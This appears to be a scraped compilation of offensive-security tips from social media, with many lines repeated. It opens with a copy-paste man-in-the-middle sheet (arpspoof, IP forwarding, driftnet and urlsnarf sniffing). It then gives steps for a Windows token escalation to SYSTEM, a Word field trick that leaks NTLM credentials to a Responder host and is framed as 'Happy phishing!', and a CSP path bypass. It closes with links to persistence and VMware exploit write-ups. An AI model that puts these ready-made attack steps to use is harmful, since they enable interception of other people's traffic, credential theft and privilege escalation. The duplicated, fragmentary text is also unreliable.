MitM Copy&Paste Sheet 😎
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
Windows Token Privilege to "nt authority\system"
- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the orginal.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the orginal.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
GitHub
0xbadjuju/Tokenvator
A tool to elevate privilege with Windows Tokens. Contribute to 0xbadjuju/Tokenvator development by creating an account on GitHub.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Persistence: “the continued or prolonged existence of something”
Part 1: https://t.co/pKk9BQoRUI
Part 2: https://t.co/XkwrKgPWqm
Part 3: https://t.co/V7xIaQVkAW
Part 1: https://t.co/pKk9BQoRUI
Part 2: https://t.co/XkwrKgPWqm
Part 3: https://t.co/V7xIaQVkAW
www.mdsec.co.uk
Persistence: “the continued or prolonged existence of something”: Part 1 – Microsoft Office – MDSec
If CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that.
This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://t.co/Dl9hkKtlQc
This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://t.co/Dl9hkKtlQc
Jsbin
JS Bin
A live pastebin for HTML, CSS & JavaScript and a range of processors, including SCSS, CoffeeScript, Jade and more...
Taking control of VMWare through the universal host controller interface
Part 1: https://www.zerodayinitiative.com/blog/2019/5/7/taking-control-of-vmware-through-the-universal-host-controller-interface-part-1
Part 2: https://www.zerodayinitiative.com/blog/2019/8/15/taking-control-of-vmware-through-the-universal-host-control-interface-part-2
#ITSecurity #pentest #hacking #hack #it
Part 1: https://www.zerodayinitiative.com/blog/2019/5/7/taking-control-of-vmware-through-the-universal-host-controller-interface-part-1
Part 2: https://www.zerodayinitiative.com/blog/2019/8/15/taking-control-of-vmware-through-the-universal-host-control-interface-part-2
#ITSecurity #pentest #hacking #hack #it
Zero Day Initiative
Zero Day Initiative — Taking Control of VMware Through the Universal Host Controller Interface: Part 1
Pwn2Own is a heck of an amazing contest. Not only because of all the media and vibe that goes with it, but because of the caliber of skills that we see demonstrated. It’s also quite fascinating to see new people burst onto the scene with mad skills. Additionally…